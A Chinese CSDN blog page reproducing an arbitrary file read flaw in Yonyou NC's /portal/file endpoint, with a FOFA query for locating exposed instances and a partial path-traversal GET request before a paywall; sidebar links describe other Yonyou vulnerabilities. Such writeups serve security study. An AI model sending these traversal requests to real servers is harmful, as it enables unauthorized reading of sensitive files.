用友NC portal/file 任意文件读取漏洞复现

最新推荐文章于 2024-04-17 16:19:35 发布
最新推荐文章于 2024-04-17 16:19:35 发布
阅读量731 收藏 1
点赞数 2
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/135738566
版权

0x01 产品简介

用友NC是一款企业级ERP软件。作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计、采购管理销售管理、物料管理、生产计划和人力资源管理等,帮助企业实现数字化转型和高效管理。

0x02 漏洞概述

用友NC 系统 /portal/file等接口存在任意文件读取漏洞,未经身份认证的攻击者可以通过此漏洞获取敏感信息,使系统处于极不安全状态。

0x03 复现环境

FOFA:app="用友-UFIDA-NC" && title=="产品登录界面"

0x04 漏洞复现

PoC

GET /portal/file?cmd=getFileLocal&fileid=..%2F..%2F..%2F..%2Fwebapps/
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
【0day】用友NC portal接口任意文件读取漏洞学习
记录并分享学习安全的知识点..
10-15 319
Yonyou NC是一款成熟的企业管理软件,已经在国内外众多企业中得到广泛应用。它具有完善的功能、稳定的性能、丰富的经验和优秀的服务,可以帮助企业提高管理效率、降低成本、提升竞争力。用友NC portal接口存在任意文件读取漏洞,攻击者可以在未经授权的情况下读取系统上的任意文件
漏洞复现用友NC-任意文件上传-uploadFile
最新发布
知黑而守白
05-05 140
用友NC是北京用友软件股份有限公司(简称“用友”)开发的一款企业管理软件,支持财务会计、人力资源、供应链、生产制造、客户关系管理等多个业务领域,涵盖了企业核心业务及管理流程。用友NC是基于B/S架构的软件系统,提供基于云计算、SaaS模式、本地部署等多种部署方式,广泛应用于国内外众多中小型企业和大型企业。用友NC允许攻击者通过uploadFile接口构造特定的请求包进行任意文件上传。该漏洞使得攻击者可以在受影响的系统上上传恶意文件,潜在风险包括远程执行恶意代码、访问敏感数据,以及其他危险操作。
用友portal接口存在任意文件读取漏洞
waxcj的博客
01-22 537
用友portal接口存在任意文件读取漏洞
漏洞复现用友NC Cloud portal/file接口任意文件读取漏洞
做自己喜欢的事,并将其发挥到极致!
01-23 889
用友 NC Cloud,大型企业数字化平台, 聚焦数字化管理、数字化经营、数字化商业,帮助大型企业实现 人、财、物、客的全面数字化,从而驱动业务创新与管理变革,与企业管理者一起重新定义未来的高度。为客户提供面向大型企业集团、制造业、消费品、建筑、房地产、金融保险等14个行业大类,68个细分行业,涵盖数字营销、智能制造、财务共享、数字采购等18大解决方案,帮助企业全面落地数字化。用友NC Cloud portal/file接口存在任意文件读取漏洞
用友U8 Cloud 反序列化RCE漏洞复现
0xSec
11-08 3785
用友U8Cloud存在多处(FileManageServlet和LoginVideoServlet)反序列化漏洞,系统未将用户传入的序列化数据进行过滤就直接执行反序列化操作,结合系统本身存在的反序列化利用链,最终造成远程代码执行。
用友NC grouptemplet任意文件上传漏洞(含批量验证poc)
weixin_43567873的博客
04-17 152
用友NC grouptemplet任意文件上传漏洞(含批量验证poc)
用友 NC ActionServlet SQL注入漏洞复现
0xSec
04-09 637
用友NC /service/~iufo/com.ufida.web.action.ActionServlet 接口处存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。
用友NC任意文件上传漏洞利用工具
04-14
用友NC任意文件上传漏洞利用工具,用友NC6.5的某个页面,存在任意文件上传漏洞漏洞成因在于上传文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞的远程攻击...
用友NC65/NCC自由报表视频合并大全
04-11
里面是自由报表得各种视频,教你手把手做报表,如交叉表,报表穿透,报表联查,报表订阅,报表如何使用查询模板,语义模型里的数据加工,元定义,语义脚本如何使用等
用友NC BeanShell远程代码执行
09-07
# 用友NC BeanShell远程代码执行 # CNVD-2021-30167 ## 漏洞描述 用友NC是一款企业级管理软件,在大中型企业广泛使用。实现建模、开发、继承、运行、管理一体化的IT解决方案信息化平台。用友 NC bsh.[servlet]...
用友NC65安装操作手册(自己编制)
10-13
用友NC65安装操作手册》是一份详尽的指南,主要针对想要自我学习和测试用友NC65的新手顾问。这份手册涵盖了从安装数据库到配置数据源的整个流程,同时也适用于其他高版本的NCC产品。下面将详细阐述其中的关键步骤...
用友账套数据文件信息读取.exe
04-15
账套数据文件信息读取.exe
用友NC portal/file 任意文件读取漏洞
weixin_52204925的博客
01-22 774
用友NC portal/file 任意文件读取漏洞
[1day]用友NC存在任意文件读取删除漏洞[附批量POC]
Liyu_6618的博客
02-01 520
[1day]用友NC存在任意文件读取删除漏洞[附批量POC]
用友 NC IUpdateService XXE漏洞复现
0xSec
01-06 1133
用友 NC IUpdateService接口存在XML实体注入漏洞,未经身份认证的攻击者可以通过此漏洞获取敏感信息,读取系统内部文件,使系统处于极不安全状态。
用友 NC 敏感信息泄露
qq_36334672的博客
01-25 273
【代码】用友 NC 敏感信息泄露。
史上最全!用友NC 漏洞汇总
2301_80115097的博客
12-01 854
参数可以读取下列所有文件,在某些情况下可以读取利用目录穿越可读取/etc/passwd等文件。版本存在未授权文件上传漏洞,攻击者可以未授权上传任意文件,进而获取服务端控制权限。版本存在反序列化漏洞,攻击者可以执行系统命令,获取服务端权限。账户密码随便填,抓包将返回包0改为1,即可任意用户登录。在其中有个接口可以获取数据库账户密码,不过是老版本了。文件管理登录页面对用户名参数没有过滤,存在。ncDecode---用友nc数据库密码解密。存在远程命令执行漏洞,通过。用友NC-OA漏洞合集。
【0day】复现用友CRM系统任意文件读取漏洞
记录并分享学习安全的知识点..
07-07 578
用友TurboCRM一直致力于为客户提供架构完整、功能全面、具有良好伸缩性的产品,以支持客户业务的快速变化与成长。产品信息用友TurboCRM产品线由包括支持全面客户接触的TurboCTI和用友TurboLINK,匹配多业务模式和业务管理的用友TurboKEY和用友TurboCRM,支持与ERP等软件无缝联接、整合应用的用友TurboEAI,满足业务决策和商业智能应用用友TurboDSS系统构成。用友TurboCRM存在任意文件读取漏洞
用友NC NCCLOUD BIP ldap公共入口uapjs漏洞补丁
ZL_1618的博客
03-29 754
补丁名称问题描述发布时间产品版本领域模块nc65_sysFunctionManager下标越界和空指针合集补丁NC6.5集团采供库存管理nc633_ldap公共入口漏洞补丁nc633_ldap公共入口漏洞补丁NC6.33UAP基础技术框架nc65_ldap公共入口漏洞补丁nc65_ldap公共入口漏洞补丁NC6.5UAP基础技术框架ncc1909ldap公共入口漏洞补丁ncc1909ldap公共入口漏洞补丁应用平台基础技术框架。
用友nc portal/file
01-26
用友NC Portal/File用友集团针对企业管理需求推出的一套云端平台和文件管理系统。通过使用该系统,企业可以实现多种功能,包括企业门户、文件管理与协作、信息发布与交流等。 首先,用友NC Portal提供了一个企业门户,通过该门户,员工可以方便地获取企业内部的各种信息和服务。员工可以登录系统,查看个人的工作任务、日程安排、考勤记录等,同时还可以浏览公司公告、文档库、内部新闻等企业发布的信息。 其次,用友NC File是一个文件管理与协作的平台。企业可以将各类文件上传至系统中进行存储和管理,包括办公文档、图纸、合同等。该系统支持多人协同编辑和共享文件,有效地提高了团队协作的效率。同时,系统还提供文件版本管理功能,可以追踪文件的修改历史,方便查看和比较不同版本的文件内容。 此外,用友NC Portal/File还具备信息发布与交流的功能。企业可以通过系统发布公司公告、通知等消息,方便员工了解企业最新动态。此外,系统还支持员工之间的留言和讨论,员工可以在系统中进行信息交流和合作,提升团队沟通效率。 总的来说,用友NC Portal/File是一款功能强大的云端平台和文件管理系统。它帮助企业实现了企业门户、文件管理与协作、信息发布与交流的多种功能,提高了企业的管理效率和团队的协作效能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值